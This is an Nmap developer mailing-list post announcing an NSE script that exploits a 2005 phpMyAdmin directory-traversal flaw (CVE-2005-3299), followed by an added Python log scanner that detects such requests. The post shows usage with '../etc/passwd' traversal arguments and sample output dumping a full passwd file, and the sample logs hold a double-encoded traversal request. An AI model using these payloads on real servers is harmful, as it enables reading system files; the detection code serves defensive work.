Nmap Development mailing list archives
[NSE] http-phpmyadmin-dir-traversal
From: Meshcheryakov Alexey <tank1st99 () gmail com>
Date: Wed, 20 Mar 2013 14:12:40 +0400
Hi nmap-dev,

attached is a script which exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1. I wrote this script for training purposes. Maybe it will be useful for someone.

-- @usage
-- nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
-- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
--
-- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve. Default: <code>../../../../../etc/passwd</code>
-- @args http-phpmyadmin-dir-traversal.outfile Output file
-- @args http-phpmyadmin-dir-traversal.dir Basepath to the services page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code>
---
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-phpmyadmin-dir-traversal:
-- |   VULNERABLE:
-- |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2005-3299
-- |     Description:
-- |       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1
-- |       allows remote attackers to include local files via the $__redirect parameter, possibly
-- |       involving the subform array.
-- |
-- |     Disclosure date: 2005-10-nil
-- |     Extra information:
-- |       ../../../../../../../../etc/passwd :
-- |   root:x:0:0:root:/root:/bin/bash
-- |   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-- |   bin:x:2:2:bin:/bin:/bin/sh
-- |   sys:x:3:3:sys:/dev:/bin/sh
-- |   sync:x:4:65534:sync:/bin:/bin/sync
-- |   games:x:5:60:games:/usr/games:/bin/sh
-- |   man:x:6:12:man:/var/cache/man:/bin/sh
-- |   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
-- |   mail:x:8:8:mail:/var/mail:/bin/sh
-- |   news:x:9:9:news:/var/spool/news:/bin/sh
-- |   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
-- |   proxy:x:13:13:proxy:/bin:/bin/sh
-- |   www-data:x:33:33:www-data:/var/www:/bin/sh
-- |   backup:x:34:34:backup:/var/backups:/bin/sh
-- |   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
-- |   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
-- |   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
-- |   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
-- |   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
-- |   syslog:x:101:103::/home/syslog:/bin/false
-- |   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
-- |   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
-- |   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
-- |   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
-- |   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
-- |   ../../../../../../../../etc/passwd saved to passwd.txt
-- |
-- |     References:
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
-- |_      http://www.exploit-db.com/exploits/1244/

Regards,
Alexey Meshcheryakov
Attachment:
http-phpmyadmin-dir-traversal.nse
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
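Added example, not part of the original post or of the attached script: a defender-side check that flags, in web server access logs, direct requests for grab_globals.lib.php (the file named in the CVE description) and ".." path segments, including percent-encoded ones. It assumes Combined Log Format; the sample lines, the libraries/ path and the parameter name f are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LIB_FILE = "grab_globals.lib.php"  # file named in the CVE description above
# ".." as a whole path segment, at the start or after / \ = & ?
TRAVERSAL = re.compile(r'(^|[/\\=&?])\.\.([/\\]|$)')

def fully_decode(target, rounds=3):
    """Percent-decode repeatedly so double-encoded %252e%252e%252f becomes ../"""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed-line"]  # never silently skip what cannot be read
    _ip, _method, target, status = m.groups()
    decoded = fully_decode(target)
    path = decoded.split("?", 1)[0].lower()
    findings = []
    if path.endswith("/" + LIB_FILE):
        findings.append("direct-library-request")  # include file hit over HTTP
    if TRAVERSAL.search(decoded):
        findings.append("path-traversal-sequence")
    if findings and status.startswith("2"):
        findings.append("served-2xx")  # server answered normally: triage first
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for flagged lines only."""
    return {n: f for n, f in ((n, classify(l)) for n, l in enumerate(lines, 1)) if f}

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [20/Mar/2013:14:12:40 +0400] "GET /pma/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Mar/2013:14:13:02 +0400] "POST /pma/libraries/grab_globals.lib.php HTTP/1.1" 200 1432 "-" "-"',
    '198.51.100.7 - - [20/Mar/2013:14:13:05 +0400] "GET /pma/index.php?f=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210 "-" "-"',
    'garbage',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE).items():
        print(n, ", ".join(f))
```

Parameters sent in a request body never reach an access log, so the first rule keys on the requested file name alone rather than on the parameter value.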